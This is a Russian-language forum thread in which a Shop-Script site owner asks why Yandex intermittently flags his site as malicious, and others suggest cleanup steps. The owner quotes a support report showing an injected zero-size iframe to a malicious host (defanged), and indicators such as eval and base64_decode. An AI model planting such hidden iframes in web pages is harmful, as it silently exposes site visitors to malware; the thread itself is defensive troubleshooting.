Помощь Yandex преодически находит вредоностный код

[Lexand]

Люди добре подскажите где искать проблему. Yandex переодически выдает "Сайт содержит код, который может быть опасен для посетителей" После моего поиска ничего подозрительного не нахожу.
В вебмастере жму перепроверить и на следующий день все в порядке, как ни в чем небывало. Но все повторилось через неделю. Может глюки yandex или у меня что-то надо искать.
Shop-Script PREMIUM

 

[bat]

качни весь сайт на комп и прогони антивирусом. он по идее должен найти файлы зараженные. конечно антивирус их хлопнет сразу, но ты будешь знать в каких файлах надо искать вирус. как правило там шифрованный javascript в конце файла - вот его и надо будет везде вручную удалять.
первым делом проверяй файлы типа htm, html и тому подобные которые браузер может открывать без дополнительных функций сервака.

 

[good60]

Люди добре подскажите где искать проблему. Yandex переодически выдает "Сайт содержит код, который может быть опасен для посетителей" После моего поиска ничего подозрительного не нахожу.
В вебмастере жму перепроверить и на следующий день все в порядке, как ни в чем небывало. Но все повторилось через неделю. Может глюки yandex или у меня что-то надо искать.
Shop-Script PREMIUM

Антивирус может и не найти ничего. Я бы вам советовал поступить по другому. Поменяйте пароль от фтп и закачайте резервную копию сайта вместо той,что у вас на сервере, перезаписав тем самым все имеющиеся файлы. Должно помочь.

 

[dellun]

Попробуй посмотреть файлы на хосте по дате изменения и проанализируй...

 

[serg600]

Можно онлайн сервисом сайт проверить

Для просмотра скрытого содержимого вы должны войти или зарегистрироваться.

 

[Lexand]

Спасибо за помощь, но ничего не помагло.
Пароли, конечно, сразу сменил.
Все файлы по дате и размеру проверял, все ОК.
Касперским прогнал все файлы, все тоже ОК.
Онлайн сервисы тоже ничего не выявели.
Сейчас удалил нафиг ту страницу на которую ругается yandex нажал перепроверить, жду результата.
Но мне кажется это какой-то косяк yandex.

Добавлено через 2 минуты

Да ерунда это все, были подобные проблемы, саппорт сам ничего толкового ответить не мог, прошло само собой.

А долго длилось сие???
А то как-то люди наверное не очень посещают сайты с помеченые вирусом.

 

[Lexand]

Вот что мне прислал саппорт:

При посещении Вашего сайта антивирусный робот Яндекса обнаружил вредоносный код следующего содержания:

[iframe src="h**p://www.sammit.cx.cc/index.php?tp=a39fb5b1431a65a6" width="0" height="0" frameborder="0"][/iframe]

Звездочки в ссылке вставлены во избежание случайного перехода, скобки в тегах изменены во избежание случайного срабатывания кода.

Также обращаем Ваше внимание на тот факт, что код появляется на любой странице сайта, но проявляет себя не при каждом заходе. Поэтому мы не исключаем возможность, что источник заражения находится внутри содержимого Ваших файлов.

Прежде всего настоятельно рекомендуем Вам:

- сменить пароль от ftp;
- сменить пароль от административной панели CMS;
- сменить пароль от РСУБД (база данных);
- сменить пароль от SSH, если Вы используете данный протокол;
- сменить пароль от панели управления веб-хостингом (DirectAdmin, Cpanel и т.п.)

После этого рекомендуем Вам проверить содержимое Ваших файлов на наличие в нем незнакомого Вам обфусцированного кода, особенно содержащего такие функции, как "eval", "base64_decode" или "gzuncompress". Также есть вероятность, что вредоносный код находится в отдельном php-файле небольшого размера (3-10 кб).

Но все равно не могу найти. Подскажите где искать???
HELP !!!!!
Готов поделить WMZ pls help!!!

 

[mdss]

в htaccess ищи, в index.php и в index.tpl.html

 

[eliteMAN]

Наверно вам шелл закинули. Проверьте структуру сайта. Смотрите лишние файлы *.php или дополнительный код в существовавших до взлома файлах.